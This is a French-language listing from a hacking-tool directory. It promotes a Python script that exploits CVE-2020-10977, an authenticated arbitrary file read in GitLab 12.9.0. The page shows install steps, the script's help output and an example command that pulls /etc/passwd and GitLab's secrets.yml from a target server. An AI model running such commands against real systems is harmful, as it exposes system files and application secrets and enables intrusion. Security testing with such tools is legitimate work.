Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
gitlab-12.9.0-file-read — Un script (censé être) meilleur que ce que l'on peut trouver sur exploit-db concernant la lecture arbitraire de fichier authentifié sur GitLab v12.9.0 (CVE-2020-10977) | Kitploit
Outils/GitHubGitHub/erk3/gitlab-12.9.0-file-read
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHuberk3/gitlab-12.9.0-file-read

gitlab-12.9.0-file-read

Un script (censé être) meilleur que ce que l'on peut trouver sur exploit-db concernant la lecture arbitraire de fichier authentifié sur GitLab v12.9.0 (CVE-2020-10977)

Voir le dépôt
il y a 5 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

L'avertissement

Uniquement à des fins de démonstration et de piratage éthique.

Le quoi

Un script (qui se veut) meilleur que ce que l'on peut trouver sur exploit-db concernant la lecture arbitraire authentifiée de fichiers sur GitLab v12.9.0 (CVE-2020-10977)

Le comment

  1. Satisfaire la dépendance (vous avez probablement déjà le reste)

pip3 install requests python-gitlab

  1. Obtenez un jeton API en utilisant vos identifiants

https://docs.gitlab.com/ee/user/profile/personal_access_tokens.html

  1. En profiter ?
root@kitploit:~
$ python3 gitlab-12.9.0-lfi.py -h
usage: gitlab-12.9.0-lfi.py [-h] -H HOST -u USER -p PASSWD -t TOKEN -f FILES

optional arguments:
  -h, --help            show this help message and exit
  -H HOST, --host HOST  The https URI to gitlab webroot
  -u USER, --user USER  The user name
  -p PASSWD, --passwd PASSWD
                        The user password
  -t TOKEN, --token TOKEN
                        The access token
  -f FILES, --files FILES
                        The absolute paths to the files on the Gitlab local system
root@kitploit:~
$ python3 gitlab-12.9.0-file-read.py -H https://gitlab.domain.com/ -u erk3 -p test1234 -t 9nsDFXshb1txxkkZAv24 -f /etc/passwd -f /etc/hosts -f /opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml
Télécharger l’outil